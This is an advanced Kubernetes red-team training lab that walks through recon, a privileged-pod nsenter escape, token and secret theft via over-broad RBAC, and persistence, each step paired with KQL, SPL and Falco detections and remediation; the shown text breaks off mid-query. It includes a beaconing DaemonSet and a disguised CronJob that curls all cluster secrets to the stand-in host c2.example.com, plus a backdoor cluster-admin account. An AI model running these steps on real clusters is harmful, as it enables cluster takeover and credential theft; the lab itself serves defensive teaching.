Lab 27: Kubernetes Attack & Defense — Pod Escape to Cluster Takeover¶
Chapter: 46 — Cloud & Container Red Teaming
Difficulty: ⭐⭐⭐⭐ Advanced
Estimated Time: 3–4 hours
Prerequisites: Chapter 46, Chapter 20, familiarity with Kubernetes concepts, basic kubectl usage, container fundamentals
Overview¶
In this lab you will:
- Perform reconnaissance against a Kubernetes cluster to enumerate namespaces, pods, services, and RBAC misconfigurations using kubectl, curl, and the Kubernetes API
- Exploit a privileged pod to escape the container namespace via nsenter, gaining full host-level access on the underlying worker node
- Conduct lateral movement by abusing overly permissive ClusterRoleBindings to access secrets across namespaces and impersonate service accounts
- Establish persistence through malicious DaemonSets and CronJobs that survive pod restarts and node rescheduling
- Deploy defensive controls including Pod Security Standards, Falco runtime rules, and network policies, and build KQL and SPL detection queries for every attack technique
Synthetic Data Only
All data in this lab is 100% synthetic and fictional. All IP addresses use RFC 1918 (10.0.0.0/8) reserved ranges. All domains use *.example or *.example.com. All service account tokens, secrets, and credentials are completely fictitious — no real credentials are referenced. All tokens shown are example values or REDACTED. This lab is for defensive education only — never use these techniques against systems you do not own or without explicit written authorization.
Scenario¶
Engagement Brief — Apex Cloud Services
Organization: Apex Cloud Services (fictional)
Domain: acme.example (SYNTHETIC)
Cluster Name: prod-east-01 (SYNTHETIC)
API Server: https://k8s-api.acme.example:6443 — 10.50.0.10 (SYNTHETIC)
Worker Node 1: node01.acme.example — 10.50.1.11 (SYNTHETIC)
Worker Node 2: node02.acme.example — 10.50.1.12 (SYNTHETIC)
Worker Node 3: node03.acme.example — 10.50.1.13 (SYNTHETIC)
Pod Network CIDR: 10.50.128.0/17 (SYNTHETIC)
Service CIDR: 10.50.64.0/18 (SYNTHETIC)
Container Registry: registry.acme.example:5000 (SYNTHETIC)
Engagement Type: Kubernetes red team assessment — full kill chain from pod compromise to cluster takeover
Scope: All namespaces, RBAC objects, pod security configurations, secrets, network policies
Out of Scope: Cloud provider control plane (IAM, VPC), physical infrastructure
Test Window: 2026-04-07 08:00 – 2026-04-11 20:00 UTC
Emergency Contact: soc@apex.example.com (SYNTHETIC)
Summary: Apex Cloud Services runs a multi-tenant Kubernetes cluster hosting microservices for their SaaS platform across 12 namespaces. A recent audit flagged several pods running with privileged security contexts and overly broad RBAC roles. The CISO has authorized a red team assessment to demonstrate the real-world impact of these misconfigurations — from initial pod compromise through full cluster takeover — then provide detection engineering and hardening recommendations.
Certification Relevance¶
Certification Mapping
This lab maps to objectives in the following certifications:
| Certification | Relevant Domains |
|---|---|
| CKS (Certified Kubernetes Security Specialist) | Cluster Hardening, System Hardening, Supply Chain Security, Runtime Security |
| CKA (Certified Kubernetes Administrator) | Cluster Architecture, Workloads, Security, Troubleshooting |
| CompTIA Security+ (SY0-701) | Domain 3: Security Architecture (18%), Domain 4: Security Operations (28%) |
| CompTIA CySA+ (CS0-003) | Domain 1: Security Operations (33%), Domain 4: Incident Response (22%) |
| SC-200 (Microsoft Security Operations Analyst) | KQL Detection, Defender for Containers, Sentinel Analytics |
| OSCP (Offensive Security Certified Professional) | Active Information Gathering, Post-Exploitation, Privilege Escalation |
Prerequisites¶
Required Tools¶
| Tool | Purpose | Version |
|---|---|---|
| kubectl | Kubernetes CLI for cluster interaction | 1.28+ |
| curl | HTTP requests to Kubernetes API | Latest |
| jq | JSON parsing for API responses | 1.7+ |
| nsenter | Linux namespace manipulation for container escape | Latest (util-linux) |
| crictl | Container runtime inspection | 1.28+ |
| Falco | Runtime threat detection for containers | 0.37+ |
| Trivy | Container image vulnerability scanning | 0.50+ |
| kube-hunter | Kubernetes penetration testing tool | Latest |
| kubeletctl | Kubelet API interaction | Latest |
Test Accounts (Synthetic)¶
| Role | Service Account | Token | Notes |
|---|---|---|---|
| Compromised App Pod | webapp-sa (ns: frontend) | REDACTED | Mounted in vulnerable web pod |
| Monitoring Agent | monitor-sa (ns: monitoring) | REDACTED | Has broad read access (misconfigured) |
| CI/CD Pipeline | cicd-deployer (ns: cicd) | REDACTED | Can create workloads in multiple namespaces |
| Cluster Admin | cluster-admin-sa (ns: kube-system) | REDACTED | Full cluster-admin privileges |
| Backup Operator | backup-sa (ns: backup) | REDACTED | Secrets read across namespaces |
Lab Environment Setup¶
# Lab Environment — Use minikube, kind, or a dedicated test cluster (SYNTHETIC)
# This lab requires a Kubernetes cluster with intentional misconfigurations.
# Recommended: kind (Kubernetes in Docker) for safe isolated testing.
# Create a 3-node cluster with kind (SYNTHETIC)
$ cat <<EOF > kind-config.yaml
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
- role: worker
- role: worker
- role: worker
networking:
  podSubnet: "10.50.128.0/17"
  serviceSubnet: "10.50.64.0/18"
EOF
$ kind create cluster --name prod-east-01 --config kind-config.yaml
Creating cluster "prod-east-01" ...
✓ Ensuring node image (kindest/node:v1.28.0)
✓ Preparing nodes
✓ Writing configuration
✓ Starting control-plane
✓ Installing CNI
✓ Installing StorageClass
✓ Joining worker nodes
Set kubectl context to "kind-prod-east-01"
# Verify cluster connectivity (SYNTHETIC)
$ kubectl cluster-info
Kubernetes control plane is running at https://10.50.0.10:6443
CoreDNS is running at https://10.50.0.10:6443/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy
$ kubectl get nodes
NAME STATUS ROLES AGE VERSION
prod-east-01-control-plane Ready control-plane 2m v1.28.0
prod-east-01-worker Ready <none> 90s v1.28.0
prod-east-01-worker2 Ready <none> 90s v1.28.0
prod-east-01-worker3 Ready <none> 90s v1.28.0
# Deploy the intentionally misconfigured lab environment (SYNTHETIC)
# This creates namespaces, RBAC roles, and vulnerable workloads
$ kubectl create namespace frontend
$ kubectl create namespace backend
$ kubectl create namespace monitoring
$ kubectl create namespace cicd
$ kubectl create namespace backup
$ kubectl create namespace database
# Deploy a privileged pod (the vulnerable entry point) (SYNTHETIC)
$ cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: webapp-vuln
  namespace: frontend
  labels:
    app: webapp
spec:
  serviceAccountName: webapp-sa
  hostPID: true   # shares the host PID namespace (intentional misconfiguration; Phase 2's nsenter escape depends on it)
  containers:
  - name: webapp
    image: registry.acme.example:5000/webapp:1.4.2
    securityContext:
      privileged: true
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /
      type: Directory
EOF
pod/webapp-vuln created
# Create overly permissive ClusterRoleBinding (SYNTHETIC)
$ cat <<EOF | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: monitor-cluster-wide
subjects:
- kind: ServiceAccount
  name: monitor-sa
  namespace: monitoring
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io
EOF
clusterrolebinding.rbac.authorization.k8s.io/monitor-cluster-wide created
Phase 1: Reconnaissance — Enumerate the Cluster¶
Objective¶
From a compromised pod, enumerate the cluster to identify attack surface, misconfigured RBAC, and high-value targets.
Step 1.1: Discover Kubernetes API from Within a Pod¶
# From inside the compromised webapp-vuln pod (SYNTHETIC)
# Kubernetes automatically mounts a service account token
$ ls -la /var/run/secrets/kubernetes.io/serviceaccount/
total 4
drwxrwxrwt 3 root root 140 Apr 7 08:15 .
drwxr-xr-x 3 root root 40 Apr 7 08:15 ..
lrwxrwxrwx 1 root root 13 Apr 7 08:15 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root 16 Apr 7 08:15 namespace -> ..data/namespace
lrwxrwxrwx 1 root root 12 Apr 7 08:15 token -> ..data/token
# Read the service account token (SYNTHETIC)
$ TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
$ CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
$ APISERVER=https://kubernetes.default.svc
# Test API access — get current pod's permissions (SYNTHETIC)
$ curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces/frontend/pods | jq '.items[].metadata.name'
"webapp-vuln"
"webapp-frontend-7d8f9c6b4a-x2k9m"
"webapp-frontend-7d8f9c6b4a-p4n7j"
Step 1.2: Enumerate Namespaces and RBAC¶
# Check what permissions this service account has (SYNTHETIC)
$ curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/apis/authorization.k8s.io/v1/selfsubjectaccessreviews \
-X POST -H "Content-Type: application/json" \
-d '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectAccessReview","spec":{"resourceAttributes":{"namespace":"frontend","verb":"list","resource":"secrets"}}}' \
| jq '.status'
{
"allowed": true,
"reason": ""
}
# Enumerate all namespaces (SYNTHETIC)
$ curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces | jq '.items[].metadata.name'
"default"
"frontend"
"backend"
"monitoring"
"cicd"
"backup"
"database"
"kube-system"
"kube-public"
"kube-node-lease"
# List all pods across all namespaces (SYNTHETIC)
$ kubectl --server=$APISERVER --certificate-authority=$CACERT --token=$TOKEN \
    get pods --all-namespaces
NAMESPACE NAME READY STATUS RESTARTS AGE
frontend webapp-vuln 1/1 Running 0 15m
frontend webapp-frontend-7d8f9c6b4a-x2k9m 1/1 Running 0 15m
frontend webapp-frontend-7d8f9c6b4a-p4n7j 1/1 Running 0 15m
backend api-server-5c9d8e7f6b-m3k2n 1/1 Running 0 15m
backend api-server-5c9d8e7f6b-j8h4p 1/1 Running 0 15m
database postgres-primary-0 1/1 Running 0 15m
database redis-cache-6f7a8b9c0d-q5w2e 1/1 Running 0 15m
monitoring prometheus-server-0 1/1 Running 0 15m
monitoring grafana-4d5e6f7a8b-r9t1y 1/1 Running 0 15m
cicd jenkins-controller-0 1/1 Running 0 15m
backup velero-7a8b9c0d1e-u3i5o 1/1 Running 0 15m
kube-system coredns-5d78c9869d-abc12 1/1 Running 0 20m
kube-system etcd-prod-east-01-control-plane 1/1 Running 0 20m
kube-system kube-apiserver-prod-east-01-control-plane 1/1 Running 0 20m
Step 1.3: Identify Misconfigured Pods¶
# Find privileged pods — high-value targets for escape (SYNTHETIC)
$ kubectl get pods --all-namespaces -o json | \
jq -r '.items[] | select(.spec.containers[].securityContext.privileged==true) |
"\(.metadata.namespace)/\(.metadata.name)"'
frontend/webapp-vuln
monitoring/prometheus-server-0
# Check for pods with hostPID or hostNetwork (SYNTHETIC)
$ kubectl get pods --all-namespaces -o json | \
jq -r '.items[] | select(.spec.hostPID==true or .spec.hostNetwork==true) |
"\(.metadata.namespace)/\(.metadata.name) hostPID=\(.spec.hostPID) hostNetwork=\(.spec.hostNetwork)"'
frontend/webapp-vuln hostPID=true hostNetwork=false
monitoring/prometheus-server-0 hostPID=true hostNetwork=false
# List service accounts with secrets mounted (SYNTHETIC)
$ kubectl get pods --all-namespaces -o json | \
jq -r '.items[] | "\(.metadata.namespace)/\(.metadata.name) sa=\(.spec.serviceAccountName)"'
frontend/webapp-vuln sa=webapp-sa
frontend/webapp-frontend-7d8f9c6b4a-x2k9m sa=default
backend/api-server-5c9d8e7f6b-m3k2n sa=api-sa
monitoring/prometheus-server-0 sa=monitor-sa
cicd/jenkins-controller-0 sa=cicd-deployer
backup/velero-7a8b9c0d1e-u3i5o sa=backup-sa
Expected Findings:
- `webapp-vuln` pod runs as privileged with the host filesystem mounted at `/host`
- `monitor-sa` has `cluster-admin` bound via ClusterRoleBinding (massively over-permissioned)
- `cicd-deployer` can create workloads across multiple namespaces
- No network policies are enforced — all pods can communicate freely
Detection — Phase 1 (Reconnaissance)¶
KQL — Detect Kubernetes API Enumeration
// Detect excessive API calls from a single pod / service account (SYNTHETIC)
AzureDiagnostics
| where Category == "kube-audit"
| where log_s has "list" or log_s has "get"
| extend verb = tostring(parse_json(log_s).verb)
| extend user = tostring(parse_json(log_s).user.username)
| extend sourceIP = tostring(parse_json(log_s).sourceIPs[0])
| extend resource = tostring(parse_json(log_s).objectRef.resource)
| where verb in ("list", "get")
| summarize RequestCount = count(), ResourcesAccessed = dcount(resource),
Resources = make_set(resource) by user, sourceIP, bin(TimeGenerated, 5m)
| where RequestCount > 50 or ResourcesAccessed > 10
| project TimeGenerated, user, sourceIP, RequestCount, ResourcesAccessed, Resources
SPL — Detect Kubernetes API Enumeration
index=kubernetes sourcetype="kube:apiserver-audit"
| spath input=log "verb" output=verb
| spath input=log "user.username" output=user
| spath input=log "sourceIPs{}" output=sourceIP
| spath input=log "objectRef.resource" output=resource
| search verb IN ("list", "get")
| bin _time span=5m
| stats count AS RequestCount dc(resource) AS ResourcesAccessed
values(resource) AS Resources by user sourceIP _time
| where RequestCount > 50 OR ResourcesAccessed > 10
Remediation — Phase 1¶
- Disable automountServiceAccountToken on pods that do not require API access
- Apply least-privilege RBAC — remove broad `list` and `get` permissions on cluster-scoped resources
- Enable Kubernetes audit logging at the `RequestResponse` level for sensitive resources
- Deploy admission controllers (OPA Gatekeeper or Kyverno) to enforce RBAC review on new bindings
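As a concrete sketch of the first two items, the service-account opt-out and a namespace-scoped replacement role might look like this (the role name `webapp-minimal` and the `configmaps` rule are illustrative, not taken from the engagement):

```yaml
# Opt the app's service account out of token automounting (SYNTHETIC)
apiVersion: v1
kind: ServiceAccount
metadata:
  name: webapp-sa
  namespace: frontend
automountServiceAccountToken: false
---
# Namespace-scoped Role granting only what the workload actually needs (SYNTHETIC)
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: webapp-minimal
  namespace: frontend
rules:
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["get"]
```

With the token no longer mounted, the Phase 1 enumeration path (`/var/run/secrets/kubernetes.io/serviceaccount/token`) is simply absent from the pod.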
Phase 2: Privilege Escalation — Pod Escape via Privileged Container¶
Objective¶
Exploit the privileged pod and hostPath mount to escape the container namespace and gain root access on the underlying worker node.
Step 2.1: Verify Privileged Status¶
# Confirm we are running as privileged (SYNTHETIC)
$ cat /proc/1/status | grep -i cap
CapInh: 0000003fffffffff
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
# All capabilities are set — this container is fully privileged
# Verify host filesystem is mounted (SYNTHETIC)
$ ls /host/etc/hostname
/host/etc/hostname
$ cat /host/etc/hostname
node02.acme.example
Step 2.2: Escape to Host via nsenter¶
# Use nsenter to break into the host's PID namespace (SYNTHETIC)
# PID 1 on the host is the init process
$ nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
# We are now running as root on the worker node (SYNTHETIC)
root@node02:~# whoami
root
root@node02:~# hostname
node02.acme.example
root@node02:~# ip addr show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP
link/ether 02:42:0a:32:01:0c brd ff:ff:ff:ff:ff:ff
inet 10.50.1.12/24 brd 10.50.1.255 scope global eth0
valid_lft forever preferred_lft forever
Step 2.3: Harvest Kubelet Credentials¶
# Read the kubelet configuration on the host (SYNTHETIC)
root@node02:~# cat /var/lib/kubelet/config.yaml | grep -A5 authentication
authentication:
anonymous:
enabled: false
webhook:
cacheTTL: 2m0s
enabled: true
# Extract the kubelet client certificate (SYNTHETIC)
root@node02:~# ls /var/lib/kubelet/pki/
kubelet-client-current.pem kubelet.crt kubelet.key
# Use the kubelet cert to authenticate to the API server (SYNTHETIC)
root@node02:~# curl -s --cert /var/lib/kubelet/pki/kubelet-client-current.pem \
  --key /var/lib/kubelet/pki/kubelet-client-current.pem \
--cacert /etc/kubernetes/pki/ca.crt \
https://10.50.0.10:6443/api/v1/nodes | jq '.items[].metadata.name'
"prod-east-01-control-plane"
"prod-east-01-worker"
"prod-east-01-worker2"
"prod-east-01-worker3"
Expected Findings:
- Full root access on worker node node02.acme.example (10.50.1.12)
- Kubelet client certificate provides node-level API access
- All containers on this node can be inspected and manipulated
Detection — Phase 2 (Privilege Escalation)¶
KQL — Detect nsenter Container Escape
// Detect nsenter execution indicating container escape attempt (SYNTHETIC)
Syslog
| where ProcessName == "falco" or Facility == "authpriv"
| where SyslogMessage has "nsenter" or SyslogMessage has "setns"
| extend ContainerID = extract("container_id=([a-f0-9]+)", 1, SyslogMessage)
| extend TargetPID = extract("target=(\\d+)", 1, SyslogMessage)
| project TimeGenerated, Computer, SyslogMessage, ContainerID, TargetPID
| sort by TimeGenerated desc
// Alternative — Defender for Containers process event (SYNTHETIC)
DeviceProcessEvents
| where FileName == "nsenter"
| where ProcessCommandLine has "--target 1" or ProcessCommandLine has "--mount"
| extend IsContainerEscape = iff(ProcessCommandLine has "--pid" and
ProcessCommandLine has "--mount", true, false)
| where IsContainerEscape == true
| project Timestamp, DeviceName, AccountName, ProcessCommandLine,
InitiatingProcessFileName
SPL — Detect nsenter Container Escape
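The matching SPL search below is a sketch: it assumes host process telemetry (auditd or Falco alerts) is forwarded to an illustrative `index=linux`; the index name, sourcetypes, and raw-event matching are assumptions, not engagement data:

```spl
index=linux (sourcetype="linux:audit" OR sourcetype="falco") "nsenter"
| search "--target 1" OR "--mount"
| eval is_container_escape=if(match(_raw, "--pid") AND match(_raw, "--mount"), "true", "false")
| where is_container_escape="true"
| table _time host user _raw
```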
Falco Rule — Container Escape via nsenter
- rule: Container Escape via nsenter
  desc: Detect nsenter used to break out of container namespace
  condition: >
    spawned_process and container and proc.name = "nsenter"
    and proc.args contains "--target" and proc.args contains "--pid"
  output: >
    nsenter container escape detected (user=%user.name container=%container.id
    command=%proc.cmdline pod=%k8s.pod.name ns=%k8s.ns.name image=%container.image.repository)
  priority: CRITICAL
  tags: [container, escape, mitre_privilege_escalation, T1611]
Remediation — Phase 2¶
- Never run pods as privileged — remove `privileged: true` from all security contexts
- Block hostPath mounts — use Pod Security Standards (`restricted` profile) or OPA policies
- Drop all capabilities and add back only what is needed: `drop: ["ALL"]`, `add: ["NET_BIND_SERVICE"]`
- Enable Falco with the Container Escape via nsenter rule above
- Use a read-only root filesystem where possible: `readOnlyRootFilesystem: true`
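Putting the list above together, a hardened replacement for the vulnerable pod might look like the following sketch (the pod name `webapp-hardened` is illustrative):

```yaml
# Hardened pod spec implementing the Phase 2 remediations (SYNTHETIC)
apiVersion: v1
kind: Pod
metadata:
  name: webapp-hardened
  namespace: frontend
spec:
  automountServiceAccountToken: false
  containers:
  - name: webapp
    image: registry.acme.example:5000/webapp:1.4.2
    securityContext:
      privileged: false
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      runAsNonRoot: true
      seccompProfile:
        type: RuntimeDefault
      capabilities:
        drop: ["ALL"]
        add: ["NET_BIND_SERVICE"]
```

This spec also passes the `restricted` Pod Security Standard enforced in Phase 5, so the same control blocks both the original misconfiguration and this class of regressions.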
Phase 3: Lateral Movement — RBAC Abuse and Secrets Exfiltration¶
Objective¶
Leverage overly permissive RBAC bindings to move laterally across namespaces, access secrets, and escalate to cluster-admin.
Step 3.1: Discover Overly Permissive ClusterRoleBindings¶
# From the escaped node, use the kubelet cert to query RBAC (SYNTHETIC)
root@node02:~# KUBECONFIG=/etc/kubernetes/kubelet.conf kubectl get clusterrolebindings \
-o json | jq -r '.items[] | select(.roleRef.name=="cluster-admin") |
"\(.metadata.name): \(.subjects[].kind)/\(.subjects[].name) in \(.subjects[].namespace)"'
cluster-admin: User/kubernetes-admin in null
monitor-cluster-wide: ServiceAccount/monitor-sa in monitoring
system:masters: Group/system:masters in null
# The monitor-sa service account has cluster-admin — jackpot (SYNTHETIC)
Step 3.2: Steal the monitor-sa Token¶
# List secrets in the monitoring namespace (SYNTHETIC)
root@node02:~# KUBECONFIG=/etc/kubernetes/kubelet.conf kubectl get secrets \
-n monitoring
NAME TYPE DATA AGE
monitor-sa-token-x7k2m kubernetes.io/service-account-token 3 45m
prometheus-config Opaque 2 45m
grafana-admin-creds Opaque 2 45m
alertmanager-webhook Opaque 1 45m
# Extract the monitor-sa token (SYNTHETIC)
root@node02:~# KUBECONFIG=/etc/kubernetes/kubelet.conf kubectl get secret \
monitor-sa-token-x7k2m -n monitoring -o jsonpath='{.data.token}' | base64 -d
eyJhbGciOiJSUzI1NiIsImtpZCI6IlJFREFDVEVEIn0.REDACTED_TOKEN_PAYLOAD.REDACTED_SIGNATURE
$ export ADMIN_TOKEN="eyJhbGciOiJSUzI1NiIsImtpZCI6IlJFREFDVEVEIn0.REDACTED_TOKEN_PAYLOAD.REDACTED_SIGNATURE"
Step 3.3: Exfiltrate Secrets Across Namespaces¶
# With cluster-admin, read secrets from all namespaces (SYNTHETIC)
$ kubectl --token=$ADMIN_TOKEN get secrets --all-namespaces \
--field-selector type=Opaque -o json | \
jq -r '.items[] | "\(.metadata.namespace)/\(.metadata.name)"'
backend/api-db-credentials
backend/jwt-signing-key
database/postgres-admin-password
database/redis-auth-token
cicd/docker-registry-creds
cicd/github-deploy-key
backup/cloud-storage-key
frontend/tls-cert-prod
monitoring/grafana-admin-creds
# Decode a secret (SYNTHETIC)
$ kubectl --token=$ADMIN_TOKEN get secret api-db-credentials \
-n backend -o jsonpath='{.data.password}' | base64 -d
REDACTED_DB_PASSWORD_SYNTHETIC
$ kubectl --token=$ADMIN_TOKEN get secret postgres-admin-password \
-n database -o jsonpath='{.data.POSTGRES_PASSWORD}' | base64 -d
REDACTED_POSTGRES_PASSWORD_SYNTHETIC
Expected Findings:
- `monitor-sa` has full `cluster-admin` access — allows reading all secrets cluster-wide
- Database credentials, JWT signing keys, registry credentials, and cloud storage keys are all accessible
- No secret encryption at rest is configured (etcd stores secrets in plaintext)
Detection — Phase 3 (Lateral Movement)¶
KQL — Detect Secrets Access Across Multiple Namespaces
// Detect a single identity reading secrets from multiple namespaces (SYNTHETIC)
AzureDiagnostics
| where Category == "kube-audit"
| extend verb = tostring(parse_json(log_s).verb)
| extend user = tostring(parse_json(log_s).user.username)
| extend resource = tostring(parse_json(log_s).objectRef.resource)
| extend namespace = tostring(parse_json(log_s).objectRef.namespace)
| where resource == "secrets" and verb in ("get", "list")
| summarize NamespaceCount = dcount(namespace),
Namespaces = make_set(namespace),
SecretAccessCount = count() by user, bin(TimeGenerated, 15m)
| where NamespaceCount > 2
| project TimeGenerated, user, NamespaceCount, SecretAccessCount, Namespaces
SPL — Detect Secrets Access Across Multiple Namespaces
index=kubernetes sourcetype="kube:apiserver-audit"
| spath input=log "verb" output=verb
| spath input=log "user.username" output=user
| spath input=log "objectRef.resource" output=resource
| spath input=log "objectRef.namespace" output=namespace
| search resource="secrets" verb IN ("get", "list")
| bin _time span=15m
| stats dc(namespace) AS NamespaceCount count AS SecretAccessCount
values(namespace) AS Namespaces by user _time
| where NamespaceCount > 2
KQL — Detect ClusterRoleBinding to cluster-admin
// Alert when any new ClusterRoleBinding grants cluster-admin (SYNTHETIC)
AzureDiagnostics
| where Category == "kube-audit"
| extend verb = tostring(parse_json(log_s).verb)
| extend resource = tostring(parse_json(log_s).objectRef.resource)
| extend requestObj = parse_json(log_s).requestObject
| where resource == "clusterrolebindings" and verb in ("create", "update", "patch")
| extend roleName = tostring(requestObj.roleRef.name)
| where roleName == "cluster-admin"
| extend subjectKind = tostring(requestObj.subjects[0].kind)
| extend subjectName = tostring(requestObj.subjects[0].name)
| extend actor = tostring(parse_json(log_s).user.username)
| project TimeGenerated, actor, verb, subjectKind, subjectName, roleName
SPL — Detect ClusterRoleBinding to cluster-admin
index=kubernetes sourcetype="kube:apiserver-audit"
| spath input=log "verb" output=verb
| spath input=log "objectRef.resource" output=resource
| spath input=log "requestObject.roleRef.name" output=roleName
| spath input=log "requestObject.subjects{}.name" output=subjectName
| spath input=log "user.username" output=actor
| search resource="clusterrolebindings" verb IN ("create", "update", "patch")
roleName="cluster-admin"
| table _time actor verb subjectName roleName
Remediation — Phase 3¶
- Audit all ClusterRoleBindings — remove any binding that grants `cluster-admin` to non-essential service accounts
- Use namespace-scoped Roles instead of ClusterRoles where possible
- Enable etcd encryption at rest for secrets using an `EncryptionConfiguration`
- Rotate all secrets immediately after detecting unauthorized access
- Use external secret managers (HashiCorp Vault, AWS Secrets Manager) instead of native K8s secrets
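The etcd encryption item can be sketched as follows; the kube-apiserver must be started with `--encryption-provider-config` pointing at this file, and the key material shown is a placeholder:

```yaml
# EncryptionConfiguration enabling AES-CBC encryption of Secrets at rest (SYNTHETIC)
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
- resources:
  - secrets
  providers:
  - aescbc:
      keys:
      - name: key1
        secret: UkVEQUNURURfU1lOVEhFVElDX0tFWQ== # REDACTED (must be a base64-encoded 32-byte key)
  - identity: {} # fallback so existing plaintext secrets remain readable during migration
```

After enabling it, rewrite existing secrets so they are stored encrypted, e.g. `kubectl get secrets --all-namespaces -o json | kubectl replace -f -`.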
Phase 4: Persistence — DaemonSet and CronJob Backdoors¶
Objective¶
Establish persistent access to the cluster that survives pod restarts, node rescheduling, and routine maintenance.
Step 4.1: Deploy a Malicious DaemonSet¶
# Deploy a DaemonSet that runs on every node (SYNTHETIC)
# Note: \$(hostname) is escaped so command substitution runs inside the
# container at beacon time, not in the local shell expanding this heredoc
$ cat <<EOF | kubectl --token=$ADMIN_TOKEN apply -f -
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: node-monitor-agent
  namespace: kube-system
  labels:
    app: node-monitor
    k8s-app: node-monitor
spec:
  selector:
    matchLabels:
      app: node-monitor
  template:
    metadata:
      labels:
        app: node-monitor
    spec:
      hostPID: true
      hostNetwork: true
      containers:
      - name: monitor
        image: registry.acme.example:5000/node-monitor:1.0
        securityContext:
          privileged: true
        command: ["/bin/sh", "-c"]
        args:
        - |
          while true; do
            curl -s http://c2.example.com:8443/beacon -d "node=\$(hostname)&ip=\$(hostname -I)" 2>/dev/null
            sleep 300
          done
        volumeMounts:
        - name: host-root
          mountPath: /host
      volumes:
      - name: host-root
        hostPath:
          path: /
      tolerations:
      - operator: Exists
EOF
daemonset.apps/node-monitor-agent created
# Verify it deployed to all nodes (SYNTHETIC)
$ kubectl --token=$ADMIN_TOKEN get pods -n kube-system -l app=node-monitor -o wide
NAME READY STATUS RESTARTS AGE IP NODE
node-monitor-agent-a1b2c 1/1 Running 0 30s 10.50.1.11 prod-east-01-worker
node-monitor-agent-d3e4f 1/1 Running 0 30s 10.50.1.12 prod-east-01-worker2
node-monitor-agent-g5h6i 1/1 Running 0 30s 10.50.1.13 prod-east-01-worker3
node-monitor-agent-j7k8l 1/1 Running 0 30s 10.50.0.10 prod-east-01-control-plane
Step 4.2: Deploy a CronJob Backdoor¶
# Create a CronJob that exfiltrates secrets every 6 hours (SYNTHETIC)
$ cat <<EOF | kubectl --token=$ADMIN_TOKEN apply -f -
apiVersion: batch/v1
kind: CronJob
metadata:
  name: log-rotation-job
  namespace: kube-system
  labels:
    app: log-rotation
spec:
  schedule: "0 */6 * * *"
  jobTemplate:
    spec:
      template:
        spec:
          serviceAccountName: cluster-admin-sa
          containers:
          - name: log-rotate
            image: registry.acme.example:5000/log-rotate:2.1
            command: ["/bin/sh", "-c"]
            args:
            - |
              kubectl get secrets --all-namespaces -o json | curl -s -X POST http://c2.example.com:8443/exfil -H "Content-Type: application/json" -d @- 2>/dev/null
          restartPolicy: OnFailure
EOF
cronjob.batch/log-rotation-job created
Step 4.3: Create a Backdoor Service Account¶
# Create a new service account with cluster-admin for re-entry (SYNTHETIC)
$ kubectl --token=$ADMIN_TOKEN create serviceaccount backdoor-sa -n kube-system
serviceaccount/backdoor-sa created
$ cat <<EOF | kubectl --token=$ADMIN_TOKEN apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: emergency-access-binding
subjects:
- kind: ServiceAccount
  name: backdoor-sa
  namespace: kube-system
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io
EOF
clusterrolebinding.rbac.authorization.k8s.io/emergency-access-binding created
# Generate a long-lived token for the backdoor account (SYNTHETIC)
$ kubectl --token=$ADMIN_TOKEN create token backdoor-sa \
-n kube-system --duration=8760h
eyJhbGciOiJSUzI1NiIsImtpZCI6IlJFREFDVEVEIn0.REDACTED_BACKDOOR_TOKEN.REDACTED_SIGNATURE
Expected Findings:
- DaemonSet runs on every node including the control plane (via a blanket `operator: Exists` toleration)
- CronJob exfiltrates secrets every 6 hours using cluster-admin privileges
- Backdoor service account persists even if the DaemonSet is discovered and removed
- All persistence mechanisms are disguised with legitimate-sounding names
Detection — Phase 4 (Persistence)¶
KQL — Detect DaemonSet Creation in kube-system
// Alert on new DaemonSet or CronJob creation in kube-system (SYNTHETIC)
AzureDiagnostics
| where Category == "kube-audit"
| extend verb = tostring(parse_json(log_s).verb)
| extend resource = tostring(parse_json(log_s).objectRef.resource)
| extend namespace = tostring(parse_json(log_s).objectRef.namespace)
| extend name = tostring(parse_json(log_s).objectRef.name)
| extend user = tostring(parse_json(log_s).user.username)
| where namespace == "kube-system"
| where resource in ("daemonsets", "cronjobs", "jobs")
| where verb in ("create", "update", "patch")
| project TimeGenerated, user, verb, resource, name, namespace
SPL — Detect DaemonSet Creation in kube-system
index=kubernetes sourcetype="kube:apiserver-audit"
| spath input=log "verb" output=verb
| spath input=log "objectRef.resource" output=resource
| spath input=log "objectRef.namespace" output=namespace
| spath input=log "objectRef.name" output=name
| spath input=log "user.username" output=user
| search namespace="kube-system" resource IN ("daemonsets", "cronjobs", "jobs")
verb IN ("create", "update", "patch")
| table _time user verb resource name namespace
KQL — Detect New ServiceAccount with cluster-admin
// Correlate: new service account creation followed by cluster-admin binding (SYNTHETIC)
let sa_created = AzureDiagnostics
| where Category == "kube-audit"
| extend verb = tostring(parse_json(log_s).verb)
| extend resource = tostring(parse_json(log_s).objectRef.resource)
| where resource == "serviceaccounts" and verb == "create"
| extend saName = tostring(parse_json(log_s).objectRef.name)
